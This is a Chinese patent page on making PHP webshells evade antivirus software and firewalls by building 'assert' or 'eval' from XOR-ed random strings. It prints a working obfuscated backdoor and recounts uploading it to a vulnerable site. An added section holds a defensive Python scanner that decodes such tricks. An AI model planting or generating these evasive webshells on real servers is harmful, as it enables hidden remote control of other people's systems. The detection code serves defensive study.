CN112099846A - Webshell killing-free method based on random character XOR operation - Google Patents
- Publication number: CN112099846A
- Application number: CN202010856314.7A
- Authority: CN (China)
- Prior art keywords: killing, webshell, characters, sensitive, method based
- Prior art date: 2020-08-24
- Legal status: Pending (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Classifications
- G06F8/72—Code refactoring (G—PHYSICS; G06—COMPUTING; CALCULATING OR COUNTING; G06F—ELECTRIC DIGITAL DATA PROCESSING; G06F8/00—Arrangements for software engineering; G06F8/70—Software maintenance or management)
- G06F21/556—Detecting local intrusion or implementing counter-measures involving covert channels, i.e. data leakage between processes (G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity; G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems; G06F21/55—Detecting local intrusion or implementing counter-measures)
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements (same parent groups G06F21/00, G06F21/50 and G06F21/55 as above)
Landscapes
- Engineering & Computer Science (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- General Physics & Mathematics (AREA)
- Physics & Mathematics (AREA)
- Computer Hardware Design (AREA)
- Virology (AREA)
- General Health & Medical Sciences (AREA)
- Health & Medical Sciences (AREA)
- Computer And Data Communications (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
A webshell killing-free method based on random character XOR operation: the sensitive keywords that a scanning system looks for are represented by representation characters, and a PHP-script webshell file is constructed from them, so that the scanning system cannot recover the sensitive keywords from the representation characters and the file evades the scanning system. The representation characters differ from the literal characters that make up the sensitive keywords; they encode an XOR relation, and evaluating that XOR relation yields the literal characters of the sensitive keywords. The invention hides the sensitive keywords behind the representation characters, so that evasion of the scanning system is achieved. Webshell files with the killing-free effect can be generated flexibly and in many forms. This improves the benefit of red-blue confrontation to network security, further raises the skill of network security personnel, and better protects network security.
Description
Technical Field
The invention relates to the technical field of network security, in particular to a webshell killing-free method based on random character exclusive-or operation.
Background
With the development of internet technology, network security has become more and more important, and with it the red-blue confrontation within network security. Red-blue exercises are one of the important protective measures for enterprises and organizations, intended to cope with the growing number of security vulnerabilities and with increasingly complex and diverse network attacks. Only by continuously running red-blue confrontations and closing the loop on vulnerabilities can an enterprise build a strong security defense system.
Red-blue confrontation is a continuous process: the adversary's attack techniques keep changing and improving, and the defense keeps improving in turn to keep the network secure. Obtaining an entry point at the web boundary is especially important for the red team, and the webshell has become the core tool by which the red team maintains its foothold at that boundary. Traditional webshells are strictly guarded against by all major antivirus products and by web application firewalls (WAF), which effectively reduces an attacker's efficiency.
In actual red-blue confrontation, the continuous improvement of the attacking side's capability is of great significance to the network security of an enterprise or organization: as the attacker's capability improves, the defender's capability improves correspondingly. The attacking side's capability is therefore also an important research direction in the network security field, and the ability to quickly make a webshell "killing-free" through code variants has become one of the red team's essential tools.
Therefore, it is necessary to provide a webshell killing-free method based on random character xor operation to overcome the deficiencies of the prior art.
Disclosure of Invention
The invention aims to avoid the defects of the prior art and provides a webshell killing-free method, and a test method, based on random character XOR operation, which hides sensitive keywords and enables evasion of a scanning system.
The above object of the present invention is achieved by the following technical means:
the webshell killing-free method based on random character XOR operation is provided, in which the sensitive keywords that a scanning system looks for are represented by representation characters, and a PHP-script webshell file is constructed from them, so that the scanning system cannot recover the sensitive keywords from the representation characters and the file evades the scanning system;
the representation characters differ from the literal characters that make up the sensitive keywords; they encode an XOR relation, and evaluating that XOR relation yields the literal characters of the sensitive keywords.
Preferably, the sensitive keyword is a sensitive function or keyword.
Preferably, the sensitive keyword is the eval or assert function.
Preferably, in the webshell killing-free method based on random character XOR operation, a first set of randomly extracted representation characters is XORed with each character of the sensitive keyword respectively to obtain a first XOR expression, and the first expression is then written as an XOR with that first set of randomly extracted representation characters to construct the PHP-script webshell file.
In another preferred embodiment of the webshell killing-free method based on random character XOR operation, each character of the sensitive keyword is represented by a character XOR.
Further, in the webshell killing-free method based on random character XOR operation, the scanning system is antivirus software or a web application firewall.
Further, the webshell killing-free method based on random character XOR operation provides a random character pool, and the random characters are drawn from that pool.
According to the webshell killing-free method based on random character XOR operation, the sensitive keywords that the scanning system looks for are represented by representation characters, and a PHP-script webshell file is constructed from them, so that the scanning system cannot recover the sensitive keywords from the representation characters and the file evades the scanning system; the representation characters differ from the literal characters that make up the sensitive keywords; they encode an XOR relation, and evaluating that XOR relation yields the literal characters of the sensitive keywords. The invention hides the sensitive keywords behind the representation characters, so that evasion of the scanning system is achieved. Generation of the webshell file is randomized, so killing-free webshell files can be generated flexibly and in many forms. This greatly improves the attacker's efficiency and sets a defensive requirement for the defender, which improves the benefit of red-blue confrontation to network security, further raises the skill of network security personnel, and better protects network security.
Detailed Description
The invention is further illustrated by the following examples.
Example 1.
A webshell killing-free method based on random character XOR operation: the sensitive keywords that a scanning system looks for are represented by representation characters, and a PHP-script webshell file is constructed from them, so that the scanning system cannot recover the sensitive keywords from the representation characters and the file evades the scanning system.
The representation characters differ from the literal characters that make up the sensitive keywords; they encode an XOR relation, and evaluating that XOR relation yields the literal characters of the sensitive keywords.
The scanning system is antivirus software or a web application firewall. During defense, the scanning software usually checks for sensitive keywords: if sensitive keywords are present in a file, the scanning system can block the network security risk; if a webshell file or similar contains no sensitive keywords, it passes the check.
The technical scheme of the invention expresses the sensitive keywords through representation characters in a form different from the keywords themselves; because the representation characters contain no sensitive keywords, evasion of the scanning system is achieved. The result of XORing the representation characters is exactly the sensitive keyword, so the function of the original file is preserved. The method therefore achieves the killing-free effect for the webshell while keeping the original file's function.
The sensitive keyword is a sensitive function or keyword, specifically the eval or assert function.
Among the logical operations, in addition to AND and OR there is XOR, called exclusive-or (异或) in Chinese, defined as: if the two values are the same the result is false, otherwise it is true. XOR can therefore be used to determine whether two values differ.
true XOR true // false
false XOR false // false
true XOR false // true
false XOR true // true
The XOR operation has one further property: XORing a value twice in succession with the same key returns the value itself.
first XOR: 1010 ^ 1111 // 0101
second XOR: 0101 ^ 1111 // 1010
This reversibility of the XOR operation is the point used to achieve the killing-free webshell.
The core of a PHP webshell is the eval function and the assert function; these two sensitive functions or keywords are also the focus of traditional antivirus software and WAFs.
The webshell killing-free method based on random character XOR operation can first randomly extract representation characters and XOR them with each character of the sensitive keyword respectively to obtain a primary XOR expression, and then write the primary expression as an XOR with the representation characters extracted the first time, to construct the PHP-script webshell file.
For example, in one embodiment:
the original is the assert function, and a six-character string is formed by randomly extracting characters and symbols, from which a PHP webshell file is constructed. In PHP:
then the traditional webshell:
<?PHP assert($_POST[123]);?>
is structured as follows:
<?PHP$a='IWP"NK'^'($#G<?';$a($_POST[123]);?>
In `<?PHP assert($_POST[123]);?>`, because the string assert is contained, the file is targeted by antivirus software and WAFs and cannot pass the security check. Restructured as above, the file no longer contains the keyword assert as literal text.
In this example, each character of the sensitive keyword to be constructed is XORed with a random character to obtain the first XOR expression 'IWP"NK', and the first XOR expression 'IWP"NK' is then written as an XOR with the first randomly extracted representation characters '($#G<?'.
Applying the example to a real scenario to verify its validity:
The red team finds a website with an arbitrary file upload vulnerability and can upload a webshell file.
The code is the traditional webshell: `<?PHP assert($_POST[123]);?>`
The file is found to be killed by the antivirus software.
A killing-free webshell file shell2.php is constructed using the XOR principle: `<?PHP$a='IWP"NK'^'($#G<?';$a($_POST[123]);?>`
After shell2.php is uploaded to the vulnerable website, the antivirus result shows that the scan found no risk. Connecting to the webshell with China Chopper, the uploaded shell2.php file can be accessed normally.
The invention hides the sensitive keywords behind the representation characters, so that evasion of the scanning system is achieved. Generation of the webshell file is randomized, so killing-free webshell files can be generated flexibly and in many forms. This greatly improves the attacker's efficiency and sets a defensive requirement for the defender, which improves the benefit of red-blue confrontation to network security, further raises the skill of network security personnel, and better protects network security.
Example 2.
A webshell killing-free method based on random character XOR operation whose other features are the same as in Embodiment 1, except that the killing-free webshell file is constructed through the XOR operation in a different way.
Each character of the sensitive keyword is represented by a character XOR. Taking eval as an example, in this embodiment pairs of characters whose XOR yields "e", "v", "a" and "l" are randomly extracted in sequence, and the PHP webshell file is constructed from them.
Since there are many character pairs whose XOR yields "e", many whose XOR yields "v", and so on, there are many ways of constructing the sensitive keyword from XOR relations, and the construction is random. PHP webshell files constructed at different times therefore take various forms, with diversity and randomness. However the characters are extracted, all that is required is that the final XOR result equals assert or eval.
The webshell killing-free method based on random character XOR operation can provide a random character pool from which the random characters are drawn, which makes constructing the XOR relation convenient.
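The two embodiments above both rely on the scanning system matching the literal text of a keyword. The following is an added example, not part of the patent, written from the scanning side: a small Python constant folder that stashes every PHP string literal, folds `.` (concatenation), `^` (byte-wise XOR, truncated to the shorter operand as PHP does) and redundant parentheses to a fixpoint, and then reports sensitive names that only appear after folding, alongside what a plain keyword match would see. It covers Embodiment 1 (one XOR over the whole six-character string) and Embodiment 2 (one XOR pair per character, concatenated), and goes slightly beyond the page by also decoding double-quoted `\xHH` escapes. The `SENSITIVE` list and the four sample files are constructed for the example; `SAMPLE_XOR` is the patent's own Embodiment 1 shell.

```python
import re
from typing import Dict, List, Tuple

# Names that keyword-based webshell scanners usually key on.  Constructed list
# for this example; tune it to the scanner or WAF being evaluated.
SENSITIVE = {"assert", "eval", "system", "exec", "shell_exec", "passthru",
             "popen", "proc_open", "preg_replace", "create_function"}

# PHP string literals: group 1 = single-quoted body, group 2 = double-quoted body.
_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"")
_PH = "\x00{}\x00"                            # placeholder for a stashed literal
_CAT = re.compile(r"\x00(\d+)\x00\s*\.\s*\x00(\d+)\x00")     # lit . lit
_XOR = re.compile(r"\x00(\d+)\x00\s*\^\s*\x00(\d+)\x00")     # lit ^ lit
_PAREN = re.compile(r"(?<![\w$\]\)])\(\s*(\x00\d+\x00)\s*\)")  # ( lit ), not a call
_VARCALL = re.compile(r"\$\w+\s*\(")          # $a(...): call through a variable
_DQ_SIMPLE = {"n": 10, "t": 9, "r": 13, "\\": 92, '"': 34, "$": 36}


def _decode(sq, dq) -> bytes:
    """Return the bytes PHP would see at run time for one literal body."""
    if sq is not None:                        # single quotes: only \\ and \' escape
        return sq.replace("\\'", "'").replace("\\\\", "\\").encode("utf-8")
    out, i = bytearray(), 0
    while i < len(dq):
        if dq[i] == "\\" and i + 1 < len(dq):
            hexm = re.match(r"x([0-9A-Fa-f]{1,2})", dq[i + 1:])
            if hexm:                          # "\x41" -> the single byte 0x41
                out.append(int(hexm.group(1), 16))
                i += 1 + len(hexm.group(0))
                continue
            if dq[i + 1] in _DQ_SIMPLE:
                out.append(_DQ_SIMPLE[dq[i + 1]])
                i += 2
                continue
        out += dq[i].encode("utf-8")          # anything else is taken literally
        i += 1
    return bytes(out)


def fold_constants(src: str) -> Tuple[str, List[bytes], int]:
    """Stash every literal behind a placeholder, then constant-fold `.`
    (concatenation, which binds tighter than `^` in PHP), `^` (byte-wise XOR,
    truncated to the shorter operand as PHP does) and redundant parentheses
    until nothing changes.  Returns (folded source, literal table, number of
    literals that existed before folding)."""
    table: List[bytes] = []

    def stash(value: bytes) -> str:
        table.append(value)
        return _PH.format(len(table) - 1)

    text = _LITERAL.sub(lambda m: stash(_decode(m.group(1), m.group(2))), src)
    n_original = len(table)
    while True:
        before = text
        text = _CAT.sub(lambda m: stash(table[int(m.group(1))] +
                                        table[int(m.group(2))]), text)
        text = _XOR.sub(lambda m: stash(bytes(x ^ y for x, y in zip(
            table[int(m.group(1))], table[int(m.group(2))]))), text)
        text = _PAREN.sub(r"\1", text)
        if text == before:
            return text, table, n_original


def scan_php(src: str) -> Dict[str, object]:
    """Compare what a plain keyword match sees (`plain_keywords`) with what
    appears only after folding (`hidden_keywords`), and note calls made
    through a variable, the form in which a decoded name gets invoked."""
    text, table, n_original = fold_constants(src)
    plain = sorted(n for n in SENSITIVE
                   if re.search(r"\b%s\s*\(" % n, src, re.IGNORECASE))
    hidden = sorted({v.decode("latin-1").lower() for v in table[n_original:]}
                    & SENSITIVE)
    return {"plain_keywords": plain, "hidden_keywords": hidden,
            "variable_call": bool(_VARCALL.search(text)),
            "suspicious": bool(hidden)}


# Constructed samples.  SAMPLE_XOR is the patent's own Embodiment 1 shell;
# SAMPLE_PAIRS builds "eval" one character at a time as Embodiment 2 describes.
SAMPLE_PLAIN = "<?PHP assert($_POST[123]);?>"
SAMPLE_XOR = "<?PHP$a='IWP\"NK'^'($#G<?';$a($_POST[123]);?>"
SAMPLE_PAIRS = ("<?php $f=('A'^'$').(\"\\x42\"^'4').('D'^'%').('E'^')');"
                " $f($_POST['c']); ?>")
SAMPLE_BENIGN = "<?php echo 'hello' . ' world'; ?>"

if __name__ == "__main__":
    for name, sample in [("plain", SAMPLE_PLAIN), ("xor", SAMPLE_XOR),
                         ("pairs", SAMPLE_PAIRS), ("benign", SAMPLE_BENIGN)]:
        print(name, scan_php(sample))
```

Running the block shows the gap the patent exploits: for `SAMPLE_PLAIN` the keyword match and the folder agree (`assert`), while for `SAMPLE_XOR` and `SAMPLE_PAIRS` the keyword match sees nothing and only the folder reports `assert` and `eval`, each invoked through a variable. Octal and `\u{}` escapes, `chr()` calls and decode chains such as base64 or rot13 are out of scope here; a production scanner would fold them the same way or evaluate the file in a sandboxed PHP.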
Several webshell killing-free files formed with the method of the invention were tested, and the results show that they evade the scanning system.
The invention hides the sensitive keywords behind the representation characters, so that evasion of the scanning system is achieved. Generation of the webshell file is randomized, so killing-free webshell files can be generated flexibly and in many forms. This greatly improves the attacker's efficiency and sets a defensive requirement for the defender, which improves the benefit of red-blue confrontation to network security, further raises the skill of network security personnel, and better protects network security.
Finally, it should be noted that the above embodiments are only used for illustrating the technical solutions of the present invention and not for limiting the protection scope of the present invention, and although the present invention is described in detail with reference to the preferred embodiments, it should be understood by those skilled in the art that modifications or equivalent substitutions can be made on the technical solutions of the present invention without departing from the spirit and scope of the technical solutions of the present invention.
Claims (7)
1. A webshell killing-free method based on random character XOR operation, characterized in that sensitive keywords that a scanning system looks for are represented by representation characters, a PHP-script webshell file is constructed from them, and the scanning system cannot recover the sensitive keywords from the representation characters, so that the file evades the scanning system;
the representation characters differ from the literal characters that make up the sensitive keywords; they encode an XOR relation, and evaluating that XOR relation yields the literal characters of the sensitive keywords.
2. The webshell killing-free method based on random character XOR operation as claimed in claim 1, wherein the sensitive keyword is a sensitive function or keyword.
3. The webshell killing-free method based on random character XOR operation as claimed in claim 2, wherein the sensitive keyword is the eval or assert function.
4. The webshell killing-free method based on random character XOR operation as claimed in claim 3, wherein a first set of randomly extracted representation characters is XORed with each character of the sensitive keyword to obtain a first XOR expression, and the first expression is then written as an XOR with that first set of randomly extracted representation characters to construct the PHP-script webshell file.
5. The webshell killing-free method based on random character XOR operation as claimed in claim 3, wherein each character of the sensitive keyword is represented by a character XOR.
6. The webshell killing-free method based on random character XOR operation as claimed in any one of claims 1 to 5, wherein the scanning system is antivirus software or a web application firewall.
7. The webshell killing-free method based on random character XOR operation as claimed in claim 6, wherein a random character pool is provided and the random characters are drawn from that pool.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202010856314.7A CN112099846A (en) | 2020-08-24 | 2020-08-24 | Webshell killing-free method based on random character XOR operation |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202010856314.7A CN112099846A (en) | 2020-08-24 | 2020-08-24 | Webshell killing-free method based on random character XOR operation |
Publications (1)
Publication Number | Publication Date |
---|---|
CN112099846A true CN112099846A (en) | 2020-12-18 |
Family
ID=73754178
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202010856314.7A Pending CN112099846A (en) | 2020-08-24 | 2020-08-24 | Webshell killing-free method based on random character XOR operation |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN112099846A (en) |
Citations (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN1604585A (en) * | 2003-09-30 | 2005-04-06 | 华为技术有限公司 | Method for security transmission of card number information from IP terminal to soft switch |
CN104933361A (en) * | 2015-06-05 | 2015-09-23 | 浪潮电子信息产业股份有限公司 | Device and method for protecting login password |
CN106919811A (en) * | 2015-12-24 | 2017-07-04 | 阿里巴巴集团控股有限公司 | File test method and device |
CN108259619A (en) * | 2018-01-30 | 2018-07-06 | 成都东软学院 | Network request means of defence and network communicating system |
US20190141075A1 (en) * | 2017-11-09 | 2019-05-09 | Monarx, Inc. | Method and system for a protection mechanism to improve server security |
DE102018102386A1 (en) * | 2018-02-02 | 2019-08-08 | Infineon Technologies Ag | Method for transmitting data, method for receiving data, master, slave, and master-slave system |
CN111163094A (en) * | 2019-12-31 | 2020-05-15 | 奇安信科技集团股份有限公司 | Network attack detection method, network attack detection device, electronic device, and medium |
Events
- 2020-08-24: CN application CN202010856314.7A (CN112099846A), status Pending
Similar Documents
Publication | Publication Date | Title |
---|---|---|
Gupta et al. | A literature survey on social engineering attacks: Phishing attack | |
Almeshekah et al. | Cyber security deception | |
Sabillon et al. | Cybercrime and cybercriminals: A comprehensive study | |
Medvet et al. | Visual-similarity-based phishing detection | |
Rao et al. | A computer vision technique to detect phishing attacks | |
Sabillon et al. | Cybercriminals, cyberattacks and cybercrime | |
Almeshekah et al. | Improving security using deception | |
Chen et al. | Intrusion detection | |
Van Heerden et al. | Classifying network attack scenarios using an ontology | |
Huang et al. | Countermeasure techniques for deceptive phishing attack | |
Hansman | A taxonomy of network and computer attack methodologies | |
Mishra et al. | Hybrid solution to detect and filter zero-day phishing attacks | |
Rai et al. | A study on cyber crimes cyber criminals and major security breaches | |
CN113645181B (en) | Distributed protocol attack detection method and system based on isolated forest | |
Telo | Supervised machine learning for detecting malicious URLs: an evaluation of different models | |
Veprytska et al. | AI powered attacks against AI powered protection: Classification, scenarios and risk analysis | |
Hashem et al. | A proposed technique for simultaneously detecting DDoS and SQL injection attacks | |
Kunwar et al. | Framework to detect malicious codes embedded with JPEG images over social networking sites | |
Goyal et al. | Cyber crime in the society: Security issues, preventions and challenges | |
Rubenstein | Nation state cyber espionage and its impacts | |
CN112099846A (en) | Webshell killing-free method based on random character XOR operation | |
Soufiane et al. | SaaS Cloud Security: Attacks and Proposedsolutions | |
Venkatesh et al. | Identification and isolation of crypto ransomware using honeypot | |
Almeshekah et al. | The case of using negative (deceiving) information in data protection | |
Gao et al. | A cyber deception defense method based on signal game to deal with network intrusion |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
| PB01 | Publication | Application publication date: 20201218 |
| SE01 | Entry into force of request for substantive examination | |
| RJ01 | Rejection of invention patent application after publication | |